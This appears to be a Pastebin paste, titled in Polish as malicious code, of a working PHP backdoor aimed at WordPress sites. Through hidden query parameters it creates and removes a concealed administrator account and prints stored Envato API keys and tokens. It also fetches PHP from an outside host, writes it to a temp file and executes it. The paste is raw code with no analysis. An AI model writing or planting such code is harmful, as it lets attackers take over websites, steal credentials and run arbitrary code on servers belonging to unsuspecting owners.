Advertisement
konsthur

Złośliwy Kod

Sep 20th, 2017
205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.95 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3.  
  4. if( !isset($_GET['go']) )
  5. {
  6.  
  7. require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
  8. $table_name = $wpdb->get_blog_prefix();
  9. $sample = 'a:1:{s:13:"administrator";b:1;}';
  10. if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
  11. if( isset($_GET['awu']) ) {
  12. $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011-06-07 00:00:00', '', '0', '100010010');");
  13. $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");
  14. $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }
  15. if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");
  16. $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");}
  17. if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
  18.   echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }
  19.  
  20.   }
  21.  
  22.   if( isset($_GET['go']) )
  23. {
  24.  
  25. if ( ! function_exists( 'wp_temp_setupx' ) ) {  
  26. $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
  27.  
  28. if($tmpcontentx = @file_get_contents("http://www.dolsh.com/codexc.txt"))
  29. {
  30.  
  31.  
  32. function wp_temp_setupx($phpCode) {
  33.     $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
  34.     $handle = fopen($tmpfname, "w+");
  35.     fwrite($handle, "<?php\n" . $phpCode);
  36.     fclose($handle);
  37.     include $tmpfname;
  38.     unlink($tmpfname);
  39.     return get_defined_vars();
  40. }
  41.  
  42. extract(wp_temp_setupx($tmpcontentx));
  43. }
  44. }
  45.  
  46.   }
  47.  
  48. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement